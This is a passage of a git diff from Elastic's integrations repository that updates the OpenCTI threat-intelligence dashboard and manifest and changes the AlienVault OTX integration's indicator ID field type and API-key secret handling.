@@ "panelIndex": "d9612960-6f48-4cd5-9e90-935f9104cff4", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -503,7 +685,17 @@ }, { "id": "logs-*", - "name": "6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "name": "6f3addee-bc85-4c90-8833-4bba92c2cab8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4734d596-5593-4e0a-934f-fa5220511c35", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b974280-cf5e-4b9a-b791-967579a4b637", "type": "index-pattern" } ], @@ -573,7 +765,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "index": "6f3addee-bc85-4c90-8833-4bba92c2cab8", "key": "event.dataset", "negate": false, "params": { @@ -586,6 +778,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4734d596-5593-4e0a-934f-fa5220511c35", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "4b974280-cf5e-4b9a-b791-967579a4b637", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -631,11 +867,12 @@ "panelIndex": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870", "title": "Indicators by provider", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -644,7 +881,17 @@ }, { "id": "logs-*", - "name": "4d21dc65-7171-4d32-bd09-c2cd0c802410", + "name": "482b8572-524f-49a5-a143-57047f20d2a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a70ca5b-4947-413d-9646-afd2d77296f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57847309-3c4e-44a5-8167-8f069fbf4850", "type": "index-pattern" } ], @@ -715,7 +962,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "4d21dc65-7171-4d32-bd09-c2cd0c802410", + "index": "482b8572-524f-49a5-a143-57047f20d2a3", "key": "event.dataset", "negate": false, "params": { @@ -728,18 +975,62 @@ "event.dataset": "ti_opencti.indicator" } } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "9a70ca5b-4947-413d-9646-afd2d77296f9", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "57847309-3c4e-44a5-8167-8f069fbf4850", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", "layerType": "data", "legendDisplay": "default", "metrics": [ @@ -772,11 +1063,12 @@ "panelIndex": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa", "title": "Indicators by type", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -785,7 +1077,17 @@ }, { "id": "logs-*", - "name": "22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "name": "8e63b1e7-d256-4a41-90bd-3153d600965c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "61e09305-5c8d-4792-bbd3-7f0d44d6c787", "type": "index-pattern" } ], @@ -830,7 +1132,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "index": "8e63b1e7-d256-4a41-90bd-3153d600965c", "key": "event.dataset", "negate": false, "params": { @@ -843,6 +1145,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "61e09305-5c8d-4792-bbd3-7f0d44d6c787", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -877,11 +1223,12 @@ "panelIndex": "fbf92495-4189-4b4a-9658-f21a129f6c61", "title": "Providers", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -890,7 +1237,17 @@ }, { "id": "logs-*", - "name": "f1983067-4b63-4ac8-a461-8a78fbd9473f", + "name": "7294212a-1593-4d40-9dc2-806ccd46f08f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7349ab95-9a05-458c-939d-3e47d01a302f", "type": "index-pattern" } ], @@ -935,7 +1292,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "f1983067-4b63-4ac8-a461-8a78fbd9473f", + "index": "7294212a-1593-4d40-9dc2-806ccd46f08f", "key": "event.dataset", "negate": false, "params": { @@ -948,6 +1305,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "7349ab95-9a05-458c-939d-3e47d01a302f", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -982,11 +1383,12 @@ "panelIndex": "356247a9-56a9-40e2-b965-d30697b9d352", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -995,7 +1397,17 @@ }, { "id": "logs-*", - "name": "ead48616-9d2d-4c33-9385-804b685d6a36", + "name": "8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "df7b758f-bdbf-401f-9c90-ffb85e97c0e0", "type": "index-pattern" } ], @@ -1022,6 +1434,7 @@ "format": { "id": "percent", "params": { + "compact": true, "decimals": 2 } }, @@ -1107,7 +1520,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "ead48616-9d2d-4c33-9385-804b685d6a36", + "index": "8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", "key": "event.dataset", "negate": false, "params": { @@ -1120,6 +1533,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "df7b758f-bdbf-401f-9c90-ffb85e97c0e0", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1150,11 +1607,12 @@ "panelIndex": "d2267d11-6549-45b4-9fdc-a386e0315a61", "title": "% of Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1163,7 +1621,17 @@ }, { "id": "logs-*", - "name": "e00f2f4b-df3c-4691-a7e4-b15f59296698", + "name": "d26b8155-87a7-41fc-af12-d35f67e7be1e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b61f81e6-f978-427e-a178-3d171c1b3fbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09a0dcdd-ec16-42a0-85c1-458fa441e030", "type": "index-pattern" } ], @@ -1190,6 +1658,7 @@ "format": { "id": "percent", "params": { + "compact": true, "decimals": 2 } }, @@ -1275,7 +1744,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "e00f2f4b-df3c-4691-a7e4-b15f59296698", + "index": "d26b8155-87a7-41fc-af12-d35f67e7be1e", "key": "event.dataset", "negate": false, "params": { @@ -1288,6 +1757,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "b61f81e6-f978-427e-a178-3d171c1b3fbe", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "09a0dcdd-ec16-42a0-85c1-458fa441e030", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1318,11 +1831,12 @@ "panelIndex": "7f6b8ea1-278b-4846-8287-017b6cd3d11d", "title": "% of Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1331,7 +1845,17 @@ }, { "id": "logs-*", - "name": "b4dd4b69-e286-4f84-95fa-227acb918a10", + "name": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2262e58c-3592-4071-8532-e74c01701ba0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a189dc93-499b-44d8-863f-fd86b64beb7d", "type": "index-pattern" } ], @@ -1417,7 +1941,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "b4dd4b69-e286-4f84-95fa-227acb918a10", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", "key": "event.dataset", "negate": false, "params": { @@ -1430,6 +1954,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "2262e58c-3592-4071-8532-e74c01701ba0", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "a189dc93-499b-44d8-863f-fd86b64beb7d", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1478,11 +2046,12 @@ "panelIndex": "f789b019-a02c-47f1-bfe2-e3ff61d324c2", "title": "Indicators by provider", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1491,7 +2060,17 @@ }, { "id": "logs-*", - "name": "6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "name": "cdde7ea0-3ad8-439e-8f31-769f1c1db33a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cab835da-4067-46cf-99f5-b080565b773d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8544f14-3915-41f2-a92e-c948a70c9cb0", "type": "index-pattern" } ], @@ -1578,7 +2157,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "index": "cdde7ea0-3ad8-439e-8f31-769f1c1db33a", "key": "event.dataset", "negate": false, "params": { @@ -1591,6 +2170,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "cab835da-4067-46cf-99f5-b080565b773d", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e8544f14-3915-41f2-a92e-c948a70c9cb0", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1639,19 +2262,53 @@ "panelIndex": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b", "title": "Indicators by type", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "### Navigation\n\n**[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd) \n[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624) \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Overview\n\nThis dashboard provides an overview of current indicator data ingested by the OpenCTI integration.\n\nIt also provides breakdowns by provider and indicator type.\n\nThe availability of fields that are specific to particular indicator types can be understood by looking at the \"No oberservables data\" and \"No ECS indicator detail\" metrics. When an indicator in OpenCTI has any related observable object, details from the observable will be stored, and whenever possible, copied to relevant ECS fields.", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "8878f9df-1575-4ca8-83a8-0ad8f1ffb968", + "w": 10, + "x": 0, + "y": 39 + }, + "panelIndex": "8878f9df-1575-4ca8-83a8-0ad8f1ffb968", + "title": "", + "type": "visualization", + "version": "8.10.1" } ], "timeRestore": false, "title": "[Logs OpenCTI] Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-29T17:01:49.130Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-23T10:28:59.397Z", "id": "ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -1660,7 +2317,17 @@ }, { "id": "logs-*", - "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:5131be68-a318-4ea6-b0d3-ff13d60a044b", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:d958d904-2e66-47f9-835d-d7d4274bba60", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:f128baf7-1873-4c4f-ac59-6babd6b3570c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:e74cb15a-9673-4c5d-ab61-eef4b0d6e122", "type": "index-pattern" }, { @@ -1670,7 +2337,17 @@ }, { "id": "logs-*", - "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:914c9b0f-b5f0-4297-9bc3-464839e5f655", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:a87bb3c1-70cd-4f25-bff2-522111d3594f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:15cc137c-faac-4c2b-8839-443fcf171187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:a0f30b01-9408-4857-b68b-23210efa7594", "type": "index-pattern" }, { @@ -1680,7 +2357,17 @@ }, { "id": "logs-*", - "name": "1768437b-561b-4346-8d9f-9194ce3ea104:e43361e4-f810-40fb-aab2-c35c5aefce8c", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:06326156-48e6-48bc-a6e4-1dd5bc5995d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:4df969ba-a380-437b-8668-2163cc9da588", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:9fc159c5-2720-47d9-bed0-105dbbee75c5", "type": "index-pattern" }, { @@ -1690,7 +2377,17 @@ }, { "id": "logs-*", - "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:5adfe022-e45e-4f3c-be23-7a888352b091", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:39604f43-aabf-4abd-ae6d-f63d5990afe4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:7bef3ba6-908e-42c7-b783-dee88aa984e4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:e148e4b0-9ea8-426e-9bb2-cf09d8576934", "type": "index-pattern" }, { @@ -1700,7 +2397,17 @@ }, { "id": "logs-*", - "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:6f3addee-bc85-4c90-8833-4bba92c2cab8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:4734d596-5593-4e0a-934f-fa5220511c35", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:4b974280-cf5e-4b9a-b791-967579a4b637", "type": "index-pattern" }, { @@ -1710,7 +2417,17 @@ }, { "id": "logs-*", - "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:4d21dc65-7171-4d32-bd09-c2cd0c802410", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:482b8572-524f-49a5-a143-57047f20d2a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:9a70ca5b-4947-413d-9646-afd2d77296f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:57847309-3c4e-44a5-8167-8f069fbf4850", "type": "index-pattern" }, { @@ -1720,7 +2437,17 @@ }, { "id": "logs-*", - "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:8e63b1e7-d256-4a41-90bd-3153d600965c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:61e09305-5c8d-4792-bbd3-7f0d44d6c787", "type": "index-pattern" }, { @@ -1730,7 +2457,17 @@ }, { "id": "logs-*", - "name": "356247a9-56a9-40e2-b965-d30697b9d352:f1983067-4b63-4ac8-a461-8a78fbd9473f", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:7294212a-1593-4d40-9dc2-806ccd46f08f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:7349ab95-9a05-458c-939d-3e47d01a302f", "type": "index-pattern" }, { @@ -1740,7 +2477,17 @@ }, { "id": "logs-*", - "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:ead48616-9d2d-4c33-9385-804b685d6a36", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:df7b758f-bdbf-401f-9c90-ffb85e97c0e0", "type": "index-pattern" }, { @@ -1750,7 +2497,17 @@ }, { "id": "logs-*", - "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:e00f2f4b-df3c-4691-a7e4-b15f59296698", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:d26b8155-87a7-41fc-af12-d35f67e7be1e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:b61f81e6-f978-427e-a178-3d171c1b3fbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:09a0dcdd-ec16-42a0-85c1-458fa441e030", "type": "index-pattern" }, { @@ -1760,7 +2517,17 @@ }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:b4dd4b69-e286-4f84-95fa-227acb918a10", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:2262e58c-3592-4071-8532-e74c01701ba0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:a189dc93-499b-44d8-863f-fd86b64beb7d", "type": "index-pattern" }, { @@ -1770,7 +2537,17 @@ }, { "id": "logs-*", - "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:cdde7ea0-3ad8-439e-8f31-769f1c1db33a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:cab835da-4067-46cf-99f5-b080565b773d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:e8544f14-3915-41f2-a92e-c948a70c9cb0", "type": "index-pattern" }, { @@ -1784,5 +2561,6 @@ "type": "index-pattern" } ], - "type": "dashboard" -} + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/manifest.yml b/packages/ti_opencti/manifest.yml index af6924de45e..41b92e3bc3b 100644 --- a/packages/ti_opencti/manifest.yml +++ b/packages/ti_opencti/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ti_opencti title: OpenCTI -version: "1.0.1" +version: "2.1.0" description: "Ingest threat intelligence indicators from OpenCTI with Elastic Agent." type: integration source: @@ -11,17 +11,21 @@ categories: - threat_intel conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" screenshots: - src: /img/screenshot1.png title: "Dashboard: OpenCTI Overview" - size: 1280x1323 + size: 1280x1329 type: image/png - src: /img/screenshot2.png title: "Dashboard: OpenCTI Tags & Quality" - size: 1280x1323 + size: 1280x1329 type: image/png - src: /img/screenshot3.png + title: "Dashboard: OpenCTI Ingestion" + size: 1280x1329 + type: image/png + - src: /img/screenshot4.png title: "Add OpenCTI integration" size: 1268x1323 type: image/png @@ -53,6 +57,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: oauth2 type: yaml title: OAuth2 Configuration diff --git a/packages/ti_otx/changelog.yml b/packages/ti_otx/changelog.yml index 30e4f3ac1a0..f9f9c620b70 100644 --- a/packages/ti_otx/changelog.yml +++ b/packages/ti_otx/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.24.1" + changes: + - description: Fix type-mapping inconsistency for `otx.id` field. + type: bugfix + link: https://github.com/elastic/integrations/pull/9308 +- version: "1.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json b/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json index 464e6a9f90b..1ea8e5b9aad 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json +++ b/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json @@ -18,7 +18,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598369, + "id": "3735598369", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -70,7 +70,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598370, + "id": "3735598370", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -121,7 +121,7 @@ "count": 1, "created": "2023-08-09T05:05:15.000Z", "expiration": "2023-09-07T00:00:00.000Z", - "id": 3450933144, + "id": "3450933144", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -170,7 +170,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598395, + "id": "3735598395", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -224,7 +224,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598410, + "id": "3735598410", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -274,7 +274,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598429, + "id": "3735598429", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml b/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml index 0fe8c1691cf..2c10fabe8fe 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml @@ -101,7 +101,7 @@ processors: if: "ctx.otx?.expiration != null" - convert: field: otx.id - type: long + type: string if: "ctx.otx?.id != null" tag: convert_otx_id - convert: diff --git a/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml b/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml index 8bd47549ec9..2cef0721657 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml @@ -5,7 +5,7 @@ fields: - name: id - type: long + type: keyword description: > The ID of the indicator. diff --git a/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml b/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml index 9c48dba8770..6ec157631ca 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml @@ -24,12 +24,13 @@ streams: show_user: true default: 5m - name: api_key - type: text + type: password title: API Key multi: false required: true show_user: true description: The Alienvault OTX API Key + secret: true - name: first_interval type: text title: First Interval diff --git a/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json b/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json index 3536db11a61..e96d8cc2c2d 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json +++ b/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json @@ -1,11 +1,11 @@ { 